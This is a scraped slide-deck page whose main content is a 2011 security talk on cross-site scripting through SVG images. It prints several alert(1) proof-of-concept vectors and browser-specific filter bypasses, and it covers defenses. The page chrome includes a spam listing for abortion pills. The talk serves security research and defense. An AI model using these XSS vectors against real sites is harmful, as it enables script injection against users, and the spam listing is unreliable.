JavaONE 2012 Using Java with HTML5 and CSS3JavaONE 2012 Using Java with HTML5 and CSS3
JavaONE 2012 Using Java with HTML5 and CSS3
 
Html5 more than just html5 v final
Html5 more than just html5 v finalHtml5 more than just html5 v final
Html5 more than just html5 v final
 
HTML5DevConf 2013 (October): WebGL is a game changer!
HTML5DevConf 2013 (October): WebGL is a game changer!HTML5DevConf 2013 (October): WebGL is a game changer!
HTML5DevConf 2013 (October): WebGL is a game changer!
 
Thats Not Flash?
Thats Not Flash?Thats Not Flash?
Thats Not Flash?
 
Academy PRO: HTML5 API graphics
Academy PRO: HTML5 API graphicsAcademy PRO: HTML5 API graphics
Academy PRO: HTML5 API graphics
 
Rich Media Advertising with SVG and JavaScript
Rich Media Advertising with SVG and JavaScriptRich Media Advertising with SVG and JavaScript
Rich Media Advertising with SVG and JavaScript
 
SVG Icons and Screen Reader Accessibility
SVG Icons and Screen Reader AccessibilitySVG Icons and Screen Reader Accessibility
SVG Icons and Screen Reader Accessibility
 
Html 5 svg
Html 5 svgHtml 5 svg
Html 5 svg
 
WHAT IS HTML5? (at CSS Nite Osaka)
WHAT IS HTML5? (at CSS Nite Osaka)WHAT IS HTML5? (at CSS Nite Osaka)
WHAT IS HTML5? (at CSS Nite Osaka)
 
Next generation Graphics: SVG
Next generation Graphics: SVGNext generation Graphics: SVG
Next generation Graphics: SVG
 
Learn svg
Learn svgLearn svg
Learn svg
 
Accessibility Hacks Version 2
Accessibility Hacks Version 2Accessibility Hacks Version 2
Accessibility Hacks Version 2
 
Accessibility Hacks version 2
Accessibility Hacks version 2Accessibility Hacks version 2
Accessibility Hacks version 2
 
Accessibility Hacks Wordcamp Manchester October 2018
Accessibility Hacks Wordcamp Manchester October 2018Accessibility Hacks Wordcamp Manchester October 2018
Accessibility Hacks Wordcamp Manchester October 2018
 
Streaming of SVG animations on the Web
Streaming of SVG animations on the WebStreaming of SVG animations on the Web
Streaming of SVG animations on the Web
 
Canvas Based Presentation tool - First Review
Canvas Based Presentation tool - First ReviewCanvas Based Presentation tool - First Review
Canvas Based Presentation tool - First Review
 
Echo HTML5
Echo HTML5Echo HTML5
Echo HTML5
 
Java script Session No 1
Java script Session No 1Java script Session No 1
Java script Session No 1
 
Html5 Canvas and Mobile Graphics
Html5 Canvas and Mobile GraphicsHtml5 Canvas and Mobile Graphics
Html5 Canvas and Mobile Graphics
 

Mehr von Mario Heiderich

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009Mario Heiderich
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!Mario Heiderich
 

Mehr von Mario Heiderich (9)

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Web Wuermer
Web WuermerWeb Wuermer
Web Wuermer
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!
 

Kürzlich hochgeladen

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 

Kürzlich hochgeladen (20)

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 

The Image that called me - Active Content Injection with SVG Files

  • 1. The Image that called me Active Content Injection with SVG Files A presentation by Mario Heiderich, 2011
  • 2. Introduction ● Mario Heiderich ● Researcher and PhD student at the Ruhr- University, Bochum ● Security Researcher for Microsoft, Redmond ● Security Consultant for XING AG, Hamburg ● Published author and international speaker ● HTML5 Security Cheatsheet / H5SC ● PHPIDS Project
  • 3. Today ● SVGs and the modern web ● What are SVGs? ● What are they capable of? ● Which browsers “understand” SVG? ● Why there are conflicted areas? ● And what does that have to do with security?
  • 4. SVG Images ● Scalable Vector Graphics ● XML based, therefore ● Versatile ● Accessible ● Compressible ● “Stylable” w. CSS ● Open ● Great for mobile devices ● Easy to parse and process ● Ancient format, older than 10 years ● Relations to HTML5, the living standard
  • 5. SVG History ● Proposed by several W3C members in 1998 ● Derived from Adobe Postscript and VML ● Developed in 1999 ● Currently at version 1.1 ● Version 1.2 still a working draft ● Might be overtaken by SVG 2.0 ● Good browser support ● Gecko, Webkit, Presto, and Trident
  • 6. Basic Example <svg xmlns=“http://www.w3.org/2000/svg“> <circle r=“40“ fill=“red“></circle> </svg>
  • 7. SVG Family ● SVG Tiny 1.2 ● Designed for cellphones and smart-phones ● 47 Tags ● SVG Basic 1.1 ● Designed for handhelds, tablets and net-books ● 71 tags ● SVG Full 1.1 ● Full feature set ● 81 tags
  • 8. Features ● Geometrical shapes ● Circles, ellipses, squares, lines and more ● SVG fonts ● Font specific formatting and glyph styles ● Links ● Animations and Transformations ● Gradients and Effects ● Meta-data ● Scripting and Events ● Inclusion of arbitrary objects
  • 10. Scripting ● The following SVG executes JavaScript <svg xmlns=“http://www.w3.org/2000/svg“> <script> alert(1) </script> </svg> ● More examples?
  • 11. More Scripting <svg xmlns="http://www.w3.org/2000/svg"> <g onload="javascript:alert(1)"></g> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <animation xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <foreignObject xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg">  <set attributeName="onmouseover" to="alert(1)"/>  </svg> <svg xmlns="http://www.w3.org/2000/svg">  <handler  xmlns:ev="http://www.w3.org/2001/xml­events"  ev:event="load" >alert(1)</handler> </svg>
  • 12. Deploying SVGs ● Several ways of deploying SVGs, implemented by modern browsers ● Five important ones are: ● Opening the file directly ● Deployment via <object> or <embed> ● Deployment via <img> or <image> ● Deployment via CSS background/list- style/content/cursor ● In-line SVG
  • 13. Security Boundaries ● SVG capabilities based on deployment method ● A model, based on expectations ● Heterogeneous implementations ● And a whole new world of bugs and vulnerabilities
  • 14. XSS ● SVGs deployed via <img> and <image> tag should not execute JavaScript ● Same goes for SVGs used via CSS ● Or SVG fonts ● SVGs deployed via <iframe>, <embed> or <object> should, though ● So browsers need different approaches ● Learning by fixing?
  • 15. Local SVGs ● SVGs opened directly are allowed to script ● Imagine the following attack: ● Attacker uploads an image with an exciting motive to a server ● Victim navigates to the image, likes it, saves it locally, downloads folder or desktop ● Victim wants to watch the image again and double-clicks it ● Image is an SVG and executes JavaScript locally ● Attacker can read local files (same directory, sub-folders) ● Attacker can even load and start Java applets or worse ● Very likely too be used in real life attacks! ● Porn sites, Email attachments, Malware
  • 16. In-line SVG ● Suggested by the HTML5 specs ● Working on all modern browsers ● Opera 11 recently joined in ● No strict XML parser anymore ● <svg><circle r=40 fill=red></svg> ● See – no quotes, no trailing slash ● Reduced feature set ● <svg> introduces many new XSS vectors ● XSS filter bypasses
  • 17. Scoping ● SVG images are treated by browsers similarly to XML ● Same is for in-line SVG blocks ● XML treats plain-text tags differently ● Entities and canonical character representations are treated equally ● 0-Day filter bypasses ahead ● This enables a new attack technique on Firefox and other browsers ● DEMO ● And it's even worse ● In-line SVG “self-terminates” open HTML elements
  • 18. Opera ● A long history of SVG flaws ● JavaScript execution via SVG fonts ● XSS via CSS background images ● SVG containing XHTML renders HTML via <img> ● Today SVGs deployed via CSS/<img> cannot script anymore ● But - not all kinds of attacks need scripting to succeed ● DEMO
  • 19. Firefox ● SVG/HTML Chameleon <?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"> </iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>
  • 20. Opera ● Using entities to execute JavaScript ● innerHTML copy/decompile bug <a href="#">CLICKME 1</a> <svg style=display:none><style> &ast;{ - o&#45fabbalink&colon;&apos;javascript&colon;alert&lpar;1 &rpar;&apos;&semi; -o&#45fabbalink-source&colon;current <span/> <a href="#">CLICKME 2</a>
  • 21. More Opera ● SVG via favicon
  • 22. Chromium ● Incredible parser tolerance ● 1<svg <g onload=alert(1) </p>
  • 23. Firefox ● Enabling XSS via entity decoding ● Entities in <style> tags create new elements ● Even broken ones, half-broken to be honest ● Bug #650001 <svg> <style>&ltimg/src=x onerror=alert(1)//
  • 24. Other Browsers ● Firefox 4 crashed badly on SVGs embedding JS ● Chrome produces weird things when using <foreignObject> and <iframe> ● Opera deploys Java applets via SVG fonts ● And what about other XML related attack patterns? ● External entities ● SVG Tiny 1.2 Java Events ● Entity bombs ● Etc. etc. ● Some browsers support SVG Masks, perfect for click- jacking ● SVG and XBL? You tell me!
  • 25. Wrap-Up ● SVGs are not just images but mini-applications ● <img> tags can now deploy Java, PDF and Flash – and call you on Skype ● In-line SVG creates small XML islands enabling XML attacks on HTML websites ● SVG and XSLT work too, enabling DoS and other attacks ● Web-security and XML security, they meet again! ● And XXE is back – remember 2002's advisories? ● SVG is not getting enough attention in the security community ● SVG provides a lot of room for more security research
  • 26. Defense ● More difficult than one might assume ● No existing filter libs ● No good documentation ● XSS vectors are hard to comprehend ● New vectors coming up weekly ● SVG files should not be perceived as images ● Allowing SVG for upload == allowing HTML for upload ● SVG can embed, link or reference any kind of content over cross domain borders ● SVG provides new ways of payload obfuscation
  • 27. Future Work ● SVG Purifier ● Based on HTMLPurifier 4.3.0 ● Still very young ● Smoke-test has been published http://heideri.ch/svgpurifier ● More articles on the HTML5 Sec Cheatsheet Wiki ● Publications, to raise awareness ● Crouching Tiger – Hidden Payload, submission CCS 2011 ● More demo vectors on the H5SC to demonstrate impact ● OWASP research and documentation?
  • 28. Links ● Wikipedia on SVG http://en.wikipedia.org/wiki/Scalable_Vector_Graphics ● W3C SVG Working Group http://www.w3.org/Graphics/SVG/ ● SVG Full 1.1 (W3C) http://www.w3.org/TR/SVG11/ ● SVG Basic 1.1 and SVG Tiny 1.2 http://www.w3.org/TR/SVGMobile/ ● SVG 2.0 http://dev.w3.org/SVG/profiles/2.0/publish/intro.html ● Adobe's SVG Zone (for archaeologists) http://www.adobe.com/svg/ ● H5SC http://html5sec.org/ ● XSLT and SVG http://scarybeastsecurity.blogspot.com/20...riousity.html ● Opera SVG Bug http://heideri.ch/opera/ ● HTMLPurifier http://htmlpurifier.org/ ● JSBin http://jsbin.com/ ● SVGPurifier Smoke-Test http://heideri.ch/svgpurifier ● More SVG fun http://maliciousmarkup.blogspot.com/20...re-xml-fun.html
  • 29. Thanks ● Thanks for listening! ● Questions or Comments? ● Discussion and tool preview? ● Thanks to ● Gareth Heyes and Manuel Caballero from UNH ● Alexey Silin / LeverOne ● Erik of Opera ● Dave Ross of Microsoft